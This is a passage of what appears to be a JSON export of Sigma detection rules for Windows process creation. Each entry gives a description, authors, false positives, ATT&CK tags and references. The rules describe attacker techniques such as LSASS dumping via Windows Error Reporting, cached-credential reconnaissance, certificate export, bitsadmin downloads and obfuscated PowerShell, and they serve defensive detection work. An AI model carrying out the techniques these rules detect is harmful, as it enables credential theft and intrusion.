"proc_creation_win_powershell_base64_encoded_obfusc.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_encoded_obfusc.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", "value": "Suspicious Obfuscated PowerShell Code" }, { "description": "Detects execution of WinRAR in order to compress a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-04", "falsepositive": [ "Legitimate use of WinRAR with a command line in which \".dmp\" or \".dump\" appears accidentally", "Legitimate use of WinRAR to compress WER \".dmp\" files for troubleshooting" ], "filename": "proc_creation_win_winrar_exfil_dmp_files.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml" ], "tags": [ "attack.collection", "attack.t1560.001" ] }, "related": [ { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", "value": "Winrar Compressing Dump Files" }, { "description": "Detects usage of bitsadmin downloading a file", "meta": { "author": "Michael Haag, FPT.EagleEye", "creation_date": "2017-03-09", "falsepositive": [ "Some legitimate apps use this, but limited." ], "filename": "proc_creation_win_bitsadmin_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://isc.sans.edu/diary/22264", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1197", "attack.s0190", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", "value": "File Download Via Bitsadmin" }, { "description": "Detects attempts to disable the Windows Firewall using PowerShell", "meta": { "author": "Tim Rauch, Elastic (idea)", "creation_date": "2022-09-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_disable_firewall.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_disable_firewall.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "12f6b752-042d-483e-bf9c-915a6d06ad75", "value": "Windows Firewall Disabled via PowerShell" }, { "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", "meta": { "author": "Harish Segar (rule)", "creation_date": "2020-03-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_downgrade_attack.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade-", "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_downgrade_attack.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b3512211-c67e-4707-bedc-66efc7848863", "value": "Potential PowerShell Downgrade Attack" }, { "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", "value": "Invoke-Obfuscation Via Use Clip" }, { "description": "An adversary might use WMI to check if a certain remote service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_recon_service.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_service.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "76f55eaa-d27f-4213-9d45-7b0e4b60bbae", "value": "Service Reconnaissance Via Wmic.EXE" }, { "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", "meta": { "author": "Julia Fomina, oscd.community", "creation_date": "2020-10-08", "falsepositive": [ "Legitimate use of Pester for writing tests for Powershell scripts and modules" ], "filename": "proc_creation_win_lolbin_pester_1.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Oddvarmoe/status/993383596244258816", "https://github.com/api0cradle/LOLBAS/blob/d148d278f5f205ce67cfaf49afdfb68071c7252a/OSScripts/pester.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pester_1.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.defense-evasion", "attack.t1216" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", "value": "Execute Code with Pester.bat" }, { "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-24", "falsepositive": [ "Legitimate use by administrators" ], "filename": "proc_creation_win_pua_runxcmd.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://www.d7xtech.com/free-software/runx/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_runxcmd.yml" ], "tags": [ "attack.execution", "attack.t1569.002", "attack.s0029" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "93199800-b52a-4dec-b762-75212c196542", "value": "PUA - RunXCmd Execution" }, { "description": "Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-02-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wget_download_susp_locations.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.gnu.org/software/wget/manual/wget.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wget_download_susp_locations.yml" ], "tags": [ "attack.execution" ] }, "uuid": "40aa399c-7b02-4715-8e5f-73572b493f33", "value": "Suspicious File Download From IP Via Wget.EXE - Paths" }, { "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-08-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_base64_frombase64string.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_frombase64string.yml" ], "tags": [ "attack.defense-evasion", "attack.t1140", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", "value": "PowerShell Base64 Encoded FromBase64String Cmdlet" }, { "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/assoc", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" ], "tags": [ "attack.persistence", "attack.t1546.001" ] }, "related": [ { "dest-uuid": "98034fef-d9fb-4667-8dc4-2eab6231724c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", "value": "Change Default File Association To Executable Via Assoc" }, { "description": "Detects suspicious and uncommon child processes of WmiPrvSE", "meta": { "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/", "https://twitter.com/ForensicITGuy/status/1334734244120309760", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1047", "attack.t1204.002", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8a582fe2-0882-4b89-a82a-da6b2dc32937", "value": "Suspicious WmiPrvSE Child Process" }, { "description": "Detects usage of cmdkey to look for cached credentials on the system", "meta": { "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-01-16", "falsepositive": [ "Legitimate administrative tasks" ], "filename": "proc_creation_win_cmdkey_recon.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1003.005/T1003.005.md#atomic-test-1---cached-credential-dump-via-cmdkey", "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx", "https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml" ], "tags": [ "attack.credential-access", "attack.t1003.005" ] }, "related": [ { "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "07f8bdc2-c9b3-472a-9817-5a670b872f53", "value": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE" }, { "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", "meta": { "author": "Julia Fomina, oscd.community", "creation_date": "2020-10-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/bohops/status/994405551751815170", "https://redcanary.com/blog/lateral-movement-winrm-wmi/", "https://lolbas-project.github.io/lolbas/Scripts/Winrm/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml" ], "tags": [ "attack.defense-evasion", "attack.t1216" ] }, "related": [ { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", "value": "Remote Code Execute via Winrm.vbs" }, { "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", "meta": { "author": "@pbssubhash , Nasreddine Bencherchali", "creation_date": "2022-12-08", "falsepositive": [ "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." ], "filename": "proc_creation_win_werfault_lsass_shtinkering.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/deepinstinct/Lsass-Shtinkering", "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", "value": "Potential Credential Dumping Via WER" }, { "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", "meta": { "author": "frack113", "creation_date": "2022-07-16", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_susp_16bit_application.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support", "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/", "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/", "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "16905e21-66ee-42fe-b256-1318ada2d770", "value": "Start of NT Virtual DOS Machine" }, { "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", "meta": { "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "creation_date": "2019-11-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4bf943c6-5146-4273-98dd-e958fd1e3abf", "value": "Invoke-Obfuscation Obfuscated IEX Invocation" }, { "description": "Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe.\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sdbinst_susp_extension.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", "https://github.com/nasbench/Misc-Research/blob/8ee690e43a379cbce8c9d61107442c36bd9be3d3/Other/Undocumented-Flags-Sdbinst.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdbinst_susp_extension.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1546.011" ] }, "related": [ { "dest-uuid": "42fe883a-21ea-4cfb-b94a-78b6476dcc83", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "18ee686c-38a3-4f65-9f44-48a077141f42", "value": "Uncommon Extension Shim Database Installation Via Sdbinst.EXE" }, { "description": "Detects Access to Domain Group Policies stored in SYSVOL", "meta": { "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", "creation_date": "2018-04-09", "falsepositive": [ "Administrative activity" ], "filename": "proc_creation_win_susp_sysvol_access.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100", "https://adsecurity.org/?p=2288", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml" ], "tags": [ "attack.credential-access", "attack.t1552.006" ] }, "related": [ { "dest-uuid": "8d7bd4f5-3a89-4453-9c82-2c8894d5655e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "05f3c945-dcc8-4393-9f3d-af65077a8f86", "value": "Suspicious SYSVOL Domain Group Policy Access" }, { "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", "meta": { "author": "frack113", "creation_date": "2021-11-26", "falsepositive": [ "Very Possible" ], "filename": "proc_creation_win_lolbin_diantz_ads.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Diantz/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", "value": "Suspicious Diantz Alternate Data Stream Execution" }, { "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", "meta": { "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", "creation_date": "2018-09-03", "falsepositive": "No established falsepositives", "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", "value": "Suspicious Encoded PowerShell Command Line" }, { "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", "meta": { "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "creation_date": "2020-10-11", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", "value": "Potential PowerShell Obfuscation Via Reversed Commands" }, { "description": "Detects uncommon child processes of \"BgInfo.exe\" which could be a sign of potential abuse of the binary to proxy execution via external VBScript", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community", "creation_date": "2019-10-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_bginfo_uncommon_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml" ], "tags": [ "attack.execution", "attack.t1059.005", "attack.defense-evasion", "attack.t1218", "attack.t1202" ] }, "related": [ { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aaf46cdc-934e-4284-b329-34aa701e3771", "value": "Uncommon Child Process Of BgInfo.EXE" }, { "description": "Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-18", "falsepositive": [ "Legitimate certificate exports by administrators. Additional filters might be required." ], "filename": "proc_creation_win_powershell_export_certificate.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate?view=windowsserver2022-ps", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a", "https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_export_certificate.yml" ], "tags": [ "attack.credential-access", "attack.execution", "attack.t1552.004", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e716b33-63b2-46da-86a4-bd3c3b9b5dfb", "value": "Certificate Exported Via PowerShell" }, { "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-05-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_webclient_casing.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_webclient_casing.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c86133ad-4725-4bd0-8170-210788e0a7ba", "value": "Net WebClient Casing Anomalies" }, { "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-19", "falsepositive": [ "Rare legitimate add to registry via cli (to these locations)" ], "filename": "proc_creation_win_reg_susp_paths.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md", "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_susp_paths.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", "value": "Reg Add Suspicious Paths" }, { "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_attrib_system_susp_paths.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0", "https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/", "https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml" ], "tags": [ "attack.defense-evasion", 